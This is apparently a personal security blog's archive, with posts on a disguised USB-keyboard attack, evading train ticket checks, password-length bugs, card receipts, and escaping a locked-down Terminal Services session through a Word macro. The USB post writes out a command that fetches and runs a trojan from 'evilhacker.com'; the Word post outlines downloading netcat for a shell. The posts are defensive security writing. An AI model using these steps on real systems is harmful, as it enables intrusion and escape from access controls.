Ogenstad.net

How far do you trust an unknown USB Stick?

patrick.ogenstad — Thu, 11 Sep 2008 21:15:45 +0000

Suppose there was an unknown USB stick, waiting to be found in your parking lot. Perhaps this would scare you enough to disable autorun throughout your domain (you’ve done that right)? Now imagine if someone gave one of your users a USB device which was connected to a workstation on your network and in turn your network was compromised. How would you explain that?

I don’t know if this is a new idea but the thought came to be while listening to the Pilot episode of the Securabit Podcast, thanks to Martin for pointing to the Podcast. In this episode they talk about YubiKey. The YubiKey is a USB authentication solution, when you plug in the YubiKey (usb device) to your computer it is recognized as a USB keyboard. It has one button and when pressed it enters a onetime password. I won’t go into any details but if you’re interested you can watch a one minute video on the YubiKey site or listen to the Securabit Podcast.

The product got me thinking, what if someone were to make a device that looks like a usb stick but in fact is a USB keyboard just like the YubiKey. However instead of being programmed to enter a random password string it was made to enter a malicious string of characters. For example an attacker might choose to target a Windows box with these characters.

[windows] + r cmd.exe [enter] tftp -i evilhacker.com GET trojan.exe %temp%\trojan.exe [enter] %temp%\trojan.exe [enter] exit [enter]

This would install a trojan on the target computer (assuming the user is allowed to runt tftp) simply because the device was connected to the computer.

This shouldn’t be a great threat and this attack in particular would be mitigated by just locking the screen. However it still doesn’t hurt to have respect for the unknown and I’d stay away from those USB sticks found in the parking lot.

Social Engineering on the Train

patrick.ogenstad — Tue, 19 Aug 2008 07:11:45 +0000

Social Engineering on the Train

During your childhood I’m sure you experienced a lot of magic, some things were just so fantastic and mind boggling you just couldn’t figure it out. For me, one of these extraordinary events was the work of train conductors. Before you laugh hear me out!

On some of the over ground trains in Sweden you don’t need a ticket to go on the train, however when the train conductor asks for your ticket you should be prepared to show it. So if you’re never asked, you basically don’t need the ticket.

There was usually just one train conductor for the entire train and he would walk between the different wagons at each station. Stepping into a wagon he could walk up to all the new passengers since he entered the last time and ask the passengers for their tickets.

What used to blow my mind was that as by magic the train conductors would always know which the new passengers were. They wouldn’t bug the existing passengers who had already shown their ticket. When I was a child I thought they must be superhuman, that they either had fantastic memory or were absolutely brilliant at what they did.

Traveling on the same trains now I can see it so easily. The train conductors don’t ask me for my ticket anymore, though they ask everyone around me.

I still have a monthly pass as it would go against my morals not to have a valid ticket, besides I also use it to ride the bus and the subways. I just find it interesting to experiment with social engineering in a harmless environment.

What I noticed was that when the train conductor entered the wagon all the new passengers would reach for their tickets. Everyone who had already shown his ticket just ignored the train conductor.

In reality the train conductors aren’t looking for new passengers, they are looking for people who want to show their tickets or rather they are looking for people who behave in a certain way.

So if I just ignore them when they come they ignore me. I’ve also tried looking at them, even having eye contact and smiling. As long as I don’t reach for my ticket I’m safe.

Looking at this from a security perspective they are very poor security guards. Their job is to protect the resource (train ride) from unauthorized use (passengers who don’t pay).

Of course taking this one step further this could be according to plan, in the name of user friendliness. As in don’t bug and annoy users who have already shown their pass. I would put my money on the former explanation.

In terms of social engineering this is really the low hanging fruits. You don’t have to engage in conversation or ask questions. It’s as easy as walking by a manned reception, if you behave like you belong on the inside many will just assume you do.

Failure to Link in

patrick.ogenstad — Mon, 29 Jan 2007 19:28:55 +0000

You’ve probably heard of LinkedIn, I have been thinking of signing up for some time but always postponed it. Finally I decided to give it a go, like many of these Internet services it’s real easy to register and get started, most people can do it in minutes. Of course the registration process was beyond me.

The idea with LinkedIn is to connect people and make them network, this has been happening in the real world for ages. For example last week I saw that the toilet in my basement was leaking, shortly afterwards the water in the shower next to it started to rise. It got ugly in a hurry, in fact I think I know where they got the inspiration for the movie.

Working with Cisco they keep telling me that it’s like network plumbing, but I assure you there plumbing and there’s plumbing. After doing some basic troubleshooting it was time to call in the cavalry, but alas I had never hired a plumber and didn’t knowÂ how to find a good one (one that I could trust).

To the rescue comes a neighbor, after talking with him he picks up his cell phone and calls a friend of his who works in the field. Now my plumbing problems are gone and this is an offline example of what LinkedIn can do, networking. Better yet when the plumber heard that I work as a network consultant he was interested in my services!

It all sounds great however, there’s no username that matches with that password.

Hm, that’s strange I just created the account. I figured something went wrong so I reset my password, still no dice. Mind you I don’t panic at this stage; I’m used to having problems registering different accounts. First I remove the funky characters from my password and try again.

The site is still unaware of my username and password. My next bet is the length of the password since I can’t very well view the internal code of the site I have to settle for the html code I can see;

input id=”session_password#login” type=”password” size=”24″ name=”session_password”

My password was 22 characters, I shouldn’t be having a problem but the search continues. On the password reset page I see this code instead:

input type=”password” name=”new_password” value=”” id=”new_password#newPassword#passwordReset” size=”16″ maxlength=”16″

Aha, maximum password length = 16. I don’t think too many people have this problem, however if my password is too long please tell me!

Anyway, now I’m LinkedIn, and here is my public profile.

[tags]password policy, maximum password length, linkedin, bad programming[/tags]

Breaking out of Jail with Microsoft Word

patrick.ogenstad — Wed, 04 Oct 2006 19:10:46 +0000

“Can you really break out of jail with just Microsoft Word, or are you just pulling my leg?”

No I would never do that, Word is really powerful, it can take you places!

Intended audience

If you are a convicted felon and reading this from prison; sorry but you are not the target audience. However, don’t despair: there’s something in here for you too!

This article is for people who care about security. If you don’t fall into this second category you really are in the first group, i.e. not the intended audience. When I’m talking about “jail”, I’m referring to a restricted Windows environment. What I mean with this is a locked down Terminal Services session, or a public Windows XP box in “kiosk” mode.

Administrators who have locked down their terminal services sessions care about what the users can do on the machine. They only want users to run the programs that are approved by the security policy. This means no cmd.exe, no freecell and no poking around in the system.

So why isn’t this article for people who haven’t locked down their environments? Because of the good ol’ “Security is a Weakest Link Problem”, meaning if you haven’t even tried to lock down your environment, you have other issues to take care of before you read this article.

Operation Lockdown

For the environment that I have set up to test this, I’ve installed a Windows Server 2003 machine and set it up to run Terminal Services. I’ve also installed Office, the goal here is to only allow a user to run Microsoft Word and nothing else.
The user’s desktop is then redirected to a share where the user doesn’t have write access. The desktop contains one item; a link to Word. Logging in to the terminal server, everything looks good; the user can basically run Word and change his password.

Apart from the above setting the rest of the GPO settings are located at the end of this article. It’s basically a few lockdown settings and a software restriction policy defaulting to “disallowed”, with an additional path rule allowing Microsoft Word.

Given this configuration let’s see what we can do.

Where does Word enter into it?

I guess the title says it all; Yes, Word is the application we are going to use to break out of the locked down jail. If you’ve tried my SYDI project, you’ve probably realized that I like Office automation. This concept would work in any Office application but I have chosen Word. If you don’t have Office installed in your locked down environment, I still think you should continue reading. Hopefully you’ll enjoy the article anyway.

What I’ve done is to write a Word macro which allows me to run shell commands or code of my choice.

You might object and say, “So? I have Macro Security set to Very High. You’d have to digitally sign the macro first.”

I most certainly would not! The Macro setting in the Office suite is to protect you against an entirely different threat. In that scenario the threat is that an attacker can send us (or our users) a Word document with an evil macro inside which is run when we open the document.

This setting does not disallow developers to create macros, run them while developing and then sign them when they are in a state where they can be shared with others.

What does this mean for us? It means that we cannot use a pre-created Word document which contains the macro. We have to create the macro ourselves on the fly each time we want to run macros. See the difference? The security setting in Word doesn’t disallow you to create and run your own macros. If we would save the document and open it again, then the security setting would kick in and disallow the macro. If we had signed it before saving then we would be allowed to run it.

In order to prevent this we would have to have a setting in office called “Don’t Allow Users to Develop Macros”.

VBA-PrisonBreak

I named the macro I created VBA-PrisonBreak (I must have been watching too much TV). You can download the VBA-PrisonBreak from here. To test it in your environment open up Microsoft Word and press [Alt]+[F11] to enter the VBA editor. Double click on “This Document”. This will give you a code Window on the right side. Copy the contents from the VBA-PrisonBreak.txt file and paste it in the Window. The file contains different subroutines, or programs if you will.

To run one of these programs you set the cursor somewhere after the Sub [Program] and before the End statement. To execute the program you press Play or [F5].

To give it a try and test something harmless, start the routine called RunCommand() and enter.

ping 127.0.0.1

When the command is completed, go back to the Word document. If everything worked out as it should you will see which command you tried to run and the results.

Let’s see if we can poke around a bit:

cmd /c dir

Hm, this won’t work unless we have command prompt scripting allowed. Then again we can create scripts of our own and run them instead. Another sub routine of VBA-PrisonBreak is called ListFilesinFolder() and takes a directory as an argument. This is just a simple example but a lot can be accomplished by scripting.

So we haven’t done anything terribly exiting. The commands we can run by using the RunCommand() routine depend on a few factors, we will look at the Software Restriction Policies. We know we can run Word, but what about the default additional ones? Among others this includes commands under c:\windows and c:\windows\system32.

“net view” and “net user /domain” might be interesting and could give us some information. After looking around we might come to the conclusion that we want to run a command which isn’t allowed by the software restriction policy.

As a normal unprivileged user we will not have write access to c:\windows or c:\windows\system32, so we can’t place any files in those directories. But in our configuration we have write access to c:\windows\temp, and even better CREATOR_OWNER has Full Control. If we can place a file in this directory we will be able to run it with RunCommand() by entering:

C:\windows\temp\mycommand.exe

Now how would we place a file there? We can’t just use copy since cmd.exe is blocked. We might be able to use xcopy or tftp. If tftp isn’t available we might still be able to expand (.exe) it from c:\windows\i386\tftp.ex_. There is also a function in VBA-PrisonBreak which lets you download files through http (HTTPDownload()). It takes source url and target file as arguments.

From here we can download netcat and gain shell access to the server. Note that cmd.exe is still restricted; unfortunately an attacker can use another file or edit a version of cmd.exe. This edited shell file can then be placed under c:\windows\temp.

It is important to realize that the credentials used in this shell will be that of the unprivileged user account.

How to Protect Yourself

It’s really easy to protect yourself against this feature, remember this is not a vulnerability or an exploit in Windows or Word. We are trying to remove features from Windows (such as disabling cmd.exe), since the features we want to remove can be used in harmful ways.

When you install Office you don’t have to install all the features, one of these features is vba (Visual Basic for Applications). Without vba this prison break wouldn’t be possible (in the way I’ve described). You can find information about this in the Office Security pages. However as you can see on the page, Microsoft recommends that you don’t disable vba and also lists the reasons why, so you have to decide for yourself. This page also mentions the “very high” macro setting, but remember what I said before: this setting doesn’t apply in this context.

Another option is to disable vba through group policies. You can do this by using the .ADM files for Microsoft Office. This is only an option if you won’t be using any macros.

Even if your business requires you to be able to run vba, I have three words for you; Defense in Depth. If one part of the system fails, this shouldn’t mean that the defense has been breached.

The default Software Restriction Policies obviously didn’t restrict as much as we would have hoped. We will definitely want to explore these settings. If a user has write (and execute) permissions to any location within a SRP Path rule that user can run whatever he wants. You could set up deny rules for these directories or you could tighten the NTFS permissions and remove execute permissions.

It would be nice if the default policies provided some sort of protection, at least since Microsoft has written in several places that they shouldn’t be changed unless you are an “advanced user”. But the Software Restriction Policies can be fixed and in this case that’s not really the problem. Since we can write VBA code we have a lot of options. VBA-PrisonBreak is mostly a proof of concept; it doesn’t really do much.

On a network level if we take the example with tftp, there’s no reason why this should be allowed to or from your machine. If we were only supposed to run Word, allowing http doesn’t make much sense either.

Earlier on I said it would be good if there was a setting in Office called “Don’t Allow Users to Develop Macros”. Unfortunately, as far as I know this kind of setting doesn’t exist. However we can create one of our own. The VBA editor is using vbe6ext.olb which by default is located in this location:

C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB

If we deny the execute permission (NTFS) to this file for the users we want to lock down they won’t be able to launch the vba editor, but will be able to run signed macros. A little word of caution; I don’t know if there are any other issues you should be aware removing execute permissions to this file, but I don’t think there is.

The problem with scripting

The macro RunCommand() creates an object called Wscript.Shell. Is this required by your business? If you remove the NTFS execute permission (for the terminal services users) to the file c:\windows\system32\scrrun.dll, they won’t be able to use the RunCommand().

Is there another library an attacker can use if you deny the features from Wscript.Shell? Disabling scrrun.dll would still allow a malicious user to download files with HTTPDownload() it uses an object called Microsoft.XMLHTTP. There are a lot of scriptable libraries in Windows. Chasing them all down is hard, and it wouldn’t solve the whole problem.

As I said above the problem isn’t related to Software Restriction Policies. Even if the SRPs are set up in a way that would prohibit the user to run a non approved executable, that user would still be able to write vba code. If vba code isn’t scary enough, an attacker could pre compile a dll with a com interface and load the functions from that dll from vba.

The Weakest Link

To find the weakest link you might have to think outside the box. But that is the fun part of security.

Ask Jesper what he thinks of Security Guides and he will tell you that they won’t make you secure (or in Jesper-/Stevespeak you won’t be Protected).

I think security guides are great but still they are just guides, not a blue print for a secure network. Most guides are fairly generic and you have to decide what parts of it to use in your environment. The security of a network isn’t as strong as the sum of all security settings; it’s as strong as the weakest link. When it comes to SRPs, a guide can’t tell you which applications makes sense in you environment.

Summary

VBA-PrisonBreak in itself won’t allow a malicious user to take control of your server. That user would have to escalate his privileges first, unless the attacker was a “power user” or an administrator to start with.

VBA-PrisonBreak is just a way to gain another foot-hold in your environment. When trying to protect our networks we don’t want to give any more ground than we have to.

If you are a criminal and have been wondering through this article how Word can help you to get out of a real prison: It’s quite easy really; just open up Word and start writing “Dear Congressman”, press [enter] twice and write your plea for pardon. If you’re really lucky a magical paper clip will come to your aid!

Note: We did not lock down the Help Menu in Word, but since we didn’t use it to gain access that way I chose to ignore that and a few other threats in this article.

Credits

I, Patrick Ogenstad, work at Netsafe. I would like to thank John Laerum from Cornerstone for providing feedback on this article.

If you liked this article, please stick around! You can subscribe to the “feed”, or get updates by email. Also be sure to check out my security fiction stories.

If you have any feedback concerning this, please post a comment or contact me.

Appendix

The group policy settings used in the test environment:

Hide these specified drives on My Computer â€“ All Drives
Prevent Access to Drives on My Computer â€“ All Drives
Remove My Computer Icon on the Desktop
Remove My Documents icon from Start Menu
Remove Help Menu from Start Menu
Remove and prevent access to the shutdown command
Remove All Programs list from the Start Menu
Prohibit Access to Control Panel
Removed pinned Program list from Start Menu
Remove frequent program list from Start Menu
Remove Search Menu from Start Menu
Remove Run Menu from Start Menu
Remove Recycle Bin icon from Desktop
Prevent Access to the Command Prompt â€“ Disable Command prompt scripting also
Prevent Access to registry editing tools
Run Only Allowed Windows Applications â€“ winword.exe
Software Restriction Policies â€“ Default Security Level â€“ Disallowed

I have left the default additional path rules as unrestricted:

%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%

Office in installed on D:\ so I added one path rule:

D:\Program Files\Microsoft Office\OFFICE11\winword.exe

[tags]Security, Locked Down, Software Restriction Policies, Terminal Services, VBA[/tags]

How To NOT Print Credit Card Receipts

patrick.ogenstad — Sun, 11 Jun 2006 14:42:03 +0000

The size of my wallet tends to grow fat every once and a while, I usually don’t carry a lot of cash so I blame all the receipts I tend to keep. Since I try to avoid carrying cash I pay almost everything with my credit card. Out of curiosity I wanted to see if I could get my credit card number by combining all the different receipts.

The card has sixteen numbers in four groups, not counting the secret three on the back of the card, and an expiration date.

Practically every receipt had the expiration date printed on them, from the rest there was a big variation. Given that my card number would be:

1234 5678 9012 3456

Some would mask all but one group:

**** **** **** 3456

Others would just mask one group:

1234 5678 **** 3456

After going through them all it seemed like group three was always masked, I have a feeling that this would be different if I had more receipts then again I can’t be sure. I’ll be checking this in the future. I’ve read about a law in the US (Federal Fair Credit Reporting Act) that would require that only the last 5 numbers are shown. In Sweden I don’t know if we have such a law.

The last receipt I found in my wallet was the one from the taxi home on Friday when I had had a night out. This taxi company actually printed out my full credit card number on the receipt along with the expiration date.

I can’t imagine how the company can be that stupid, I’ve sent them an email and now I’m eagerly awaiting their response.

I don’t know how many dumpster divers we have in my area, but it would be nice to not have to shred everything you through away, I mean it is a bit hot to use the fireplace during the summer.

[tags]security, credit cards, stupidity[/tags]

The Failure of Information Security

patrick.ogenstad — Wed, 10 May 2006 20:07:54 +0000

“They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to scramble out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite complacently. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray – yet we tolerated it since we are use to it.”

This paragraph starts of Noam Eppel’s article titled The Complete, Unquestionable and Total Failure of Information Security. I think it’s a very interesting read but I don’t entirely agree on his more or less pitch black view of things. I guess it reminds me to much of Despair Inc..

There are a lot of problems when it comes to IT Security, but this doesn’t differ much from the “real world”. Sure you have click and play rootkits and what not, anybody can learn to break into a computer using tools easily found. You don’t have to be skilled to; grab someone’s purse, steal a car, physically “deface” someone, blackmail, steal from the office and so on.

Ok, so the Internet is a dangerous place. This doesn’t mean consumers or corporations can’t mitigate the risks and stay reasonably secure.

Might I guess that the user who created the screenshot with all the spyware wasn’t logged in as a limited user?

Anyway I’m looking forward to Noam’s next update and make sure you read his article.

[tags]security, cyber crime, hacking[/tags]

Speaking of Stupid Hackers

patrick.ogenstad — Tue, 09 May 2006 15:37:47 +0000

Martin McKeay has a post of another brilliant way to get caught. Since this guy actually put people’s life at risk, I hope he gets a harsher punishment than the credit card guy.

[tags]security, hacking[/tags]

Buying a Spot in Prison with a Stolen Card

patrick.ogenstad — Fri, 05 May 2006 12:21:21 +0000

This is just sad, according to this article a guy is facing one to two years in jail for hacking. He got caught stealing credit card information and ordering goods which he shipped to his home address. I have two theories of what happened.

He is so stupid he deserves jail time for that too along with his other crime.
He has a brother in jail and has seen Prison Break, now he is about to free his brother.

I think I favor the stupidity theory, to make the prison stay a bit more comfortable I’ll just go ahead and recommend this colorful wallpaper to decorate the cell.

[tags]cyber crime, fraud, stupidity[/tags]

PayPal’s Security Question

patrick.ogenstad — Thu, 04 May 2006 19:35:57 +0000

I was setting up a personal PayPal account today and during registration want me to provide answers to two “secret questions”. This is nothing new and usually I just do what Bruce Schneier talks about it his curse; enter gibberish.

Feeling very clever I press the signup button, the result:

Your information is incomplete or incorrect. Please correct the fields below and try again:

You may not enter numbers in your mother’s maiden name.

You must enter exactly four numbers or letters for the last four digits of your driver’s license number.

What could possess anyone to do this? This is just plain stupid. PayPal’s password policy forces you to have eight or more characters, but the secret question for your driver’s license doesn’t allow you to have more than four characters.

[tags]security, passwords, authentication[/tags]

How To Get a Car for Under $50

patrick.ogenstad — Wed, 12 Apr 2006 19:04:28 +0000

This isnâ€t related to computer security, rather unauthorized access or policy problems. I had been planning on washing my car for quite some time, time and other factors (read laziness) had however kept me from doing so. It had come to the point where you tried to avoid your clothes touching the car while stepping into it, I wouldnâ€t have been surprised if some kid had written on it with his fingers; Dirty!

I could have driven it through a car wash but it wouldnâ€t have been enough to get it clean. Instead I went to a company where they clean the car for you at a reasonable price 300 Swedish Krona (roughly $39).

Now the problem arises when Iâ€m there to leave my car, they just want my key and say that I pay when I come back. I donâ€t think thereâ€s anything wrong with the company, others who have used them have been happy and theyâ€ve been around for a while.

However I have trouble comprehending how you could have a system that works that way. Whatâ€s to stop someone else walking into the store and pay $39 and then drive off with my car?

I wasnâ€t expecting to get a digitally signed service order, but some kind of paper would have been comforting. They could have asked to see my driverâ€s license when I left off and picked up the car.

My car is safe in my garage now but I hope those guys change their policy.

[tags]security policy, grand theft auto, security awareness[/tags]